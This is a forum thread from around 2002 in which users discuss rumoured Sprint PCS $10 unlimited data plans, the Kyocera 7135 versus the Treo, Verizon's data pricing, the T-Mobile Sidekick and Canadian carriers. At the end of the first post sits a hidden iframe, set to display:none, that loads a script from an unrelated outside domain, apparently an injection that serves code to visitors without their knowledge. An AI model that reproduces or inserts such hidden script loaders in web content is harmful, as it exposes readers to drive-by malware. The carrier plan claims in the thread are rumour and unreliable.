Has anybody seen this thread on Howard Forum? http://www.howardforums.com/showthre...threadid=56523 According to the rumors (which many say are true) Sprint will be coming out with new plans this weekend which will include $10 for unlimited data. If this is true, it would be awesome. This may be the thing that turns me to a Treo on Sprint. If Sprint isn't going to get the 7135 until next year, I don't think I can wait. I know that the features of the 7135 are better than the Treo, but the Treo is here now and if it will be available with unlimited data. I am not sure I can resist. Also, I was playing with the Treo the other day and really liked the keyboard. I am pretty good at Graffiti, but I was even better with my thumbs. I think a small keyboard may be the way to go especially if you are going to use the device for e-mail. Please, no flames. I think the 7135 is a fantastic gizmo, but Verizon doesn't have unlimited data and who knows when Sprint will get the phone. I guess we will just have to wait until this weekend to see if the rumors are true.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
well i agree, the 7135 is c cool phone, but is sprint doesnt get it until next year then i will porbably pass on the phone.. the i330 'seems' to be available online at best buy and there are more phones coming down the pike (treo is one but ugly cheaply made device IMO so its not an option) that will take the front seat over the 7135...
Have to agree with the comments marctronixx makes about the Treo. Given, it's all just personal opinion but I hate those thumb-boards with a passion and I saw one not too long ago at Circuit City -- doesn't appeal aesthetically.

Actually, Verizon does have unlimited data... but it currently costs $99/month.
But don't everybody jump ship yet. First of all it is a rumor. It is probably true, but we should wait and see. Plus, HELLO have you ever heard of a silly little concept called, "COMPETITION"?
If Sprint PCS does unlimited data for $10/month, don't you think their cut-throat competitor, Verizon, wouldn't slash their prices too to go head to head?
Don't leave the big V yet, this should make things really interesting between the two giants.
Let's just say I will be monitoring this vewy vewy closely!

Ok listen, these plans will have unlimited vision and long distance. They only require one year agreements, can only be activated on phones (not cards), and are out because Sprint decided the mb thing was just too confusing.
The skeptical people in this forum have absolutely no idea what they are talking about, I have the plans in front of me and I have already sold one of the new plans today (got in trouble though). These are holiday promotions that Sprint is pushing asap! Len Laur is VERY customer oriented and has been fixing what the PRICK Chuck Levine ##ucked up!
I have absolutely nothing to benefit from posting these new plans except knowing that Sprint will go back to the top where it belongs! WE will be number 1 again!!! I already have over 20 people that are waiting to sign up on these plans and still counting!!!!! Thanks again and hope I have helped some of ya'll out!
Holiday promo? That says to me it will end Jan 1, 03. Ok Verizon, the clock will be ticking. I won't let this plan pass me by if it's true. I'll even give up my old phone number for $10 unlimited 3g data and I don't care which phone it is, be it two tin cans and a string betwixt the two. (yall may think I'm joking, but I'm serious)
I have to say if these new plans are indeed coming down the pipe, I may spring for a Treo too. Considering some previous posts regarding Sprint allowing the the phone payment split over a few months, its a hard combination to beat. If and when Sprint does get the 7135 I can always pass the Treo over to the wife.
T-Mobile Sidekick - $40/month. Unlimited data (for the first year). 200 Anytime Minutes(tm) and 1000 Weekend Minutes.
OK, so the phone time sucks (as does the quality of the phone accordig to some), and many of you have a thing against GSM, BUT I can see this plan and device being a direct competitor to the Sprint PCS Vision network.
The competition is already heating up ... cant wait for the other US carriers to make wireless access affordable for everyone too

That's cool, however I have key palm apps I use for business. While I could find pocketpc apps that did the same thing, and maybe even symbian apps, it's my understanding that the Sidekick doesn't allow 3rd party apps. Mainly what I like about unlimited internet is not having to worry about usage. I may go weeks and not use it at all then all of a sudden use it heavily. I did see the Sidekick at CompUSA. It's slick, for what it does. The aspect ratio lends itself to landscape. If they ever wanted to make a high end unit with 640x480 color it would be cooler.
Check this out: http://home.mchsi.com/~subby1977/Plans.htm. It lists the new Sprint plans. It was posted on sprintuser.com and re-posted on Howard Forums. These plans seem real.

Yet
Danger are opening up their developer program early next year for third party apps. They really should have seeded the develop community before hand ... oh, well.
Eitherway, have a look at apps written in J2ME that might do what you want. The HipTop/sideKick effectly crosscompiles bytecode form the J2ME app to its native format.

Um, I didn't think Verizon charged for Data. When you're connected you're connected... and it doesn't matter if you're talking on the phone or browsing the web.

You are correct for 2G data, but it's unclear if they will continue that policy for 3G data rates.

I believe he is referring to Verizon's 3G/2.5G Express Network. Verizon bills in multiple ways for this service. You can choose an Express Network plan (which are more expensive than voice only plans) where you use your minutes for both voice and 3G data, choose a plan based on data useage (like Sprint), or add an unlimited 3G data option to most existing plans for $99.
Will these Sprint holiday plans only be good for the one year contract period. If they are short term that would be pretty shady. Would that leave you up in the air after it expires?

Pardon my ignorance, but...
Is the extra $ for 3G data something desirable for faster web browsing on the 7135 itself, or for on a laptop when using the 7135 as a modem, or both, or neither?
I doubt I'll use the 7135 much as a laptop modem (famous last words, I'm sure), but I'll definitely be online through the phone itself.

It's going to be great for BOTH. And I plan to use and abuse it both ways. Sprint doesn't know what they are getting themselves into giving me unlimited data for $10! I doubt a month will go by that I don't use over a gig of data.

Thanks for any clarification.

For Verizon, the $99 unlimited 3G data option is applicable for browsing on both the phone and when the phone is connected to the laptop as a wireless modem.
As far as Sprint, I've heard rumors (so take it with a grain of salt) that the $10 option will not be for smartphones. Instead, $99 will be the deal for unlimited data on devices like the 2032 and treo 300. Again, these are only rumors. I sure hope Sprint goes for the $10 unlimited option regardless of whatever device the plan is associated with. I guess tomorrow we will know for sure.
It feels like Xmas. Tomorrow morning I'm going to wake up and see what Santa left at sprintpcs.com. If it's true, and the 7135 or i500 are neither ready in time before the special ends, then Kyocera and Samsung will have missed a crucial opportunity. I hope they are reading this. They really need to start working around the clock fixing any bugs.
Does anyone think these plans will affect Bell Mobility or Telus in Canada?
Presently, we're paying 5$ for 100 minutes (pre-paid) and I surf only on the 6035 (no laptop, I use the 6035 as my laptop )which is a pretty crappy deal. I think with Telus you pay 15 cents the minute, or 15$ for some pre-packagced web stuff. If i read their site right, you can ONLY surf those sites?
Oh, another question, does anyone know if I can connect to my own ISP WITHOUT the 5$ a month for 100 data minutes thingy?
And I read in another thread..we can buy the phone at either Verizon or Sprint, and activate it with Telus? And what about Bell?
Here's hoping the 7135 comes to Canada soon (either I'll buy it in the states, or just wait..and wait..and wait):drink1
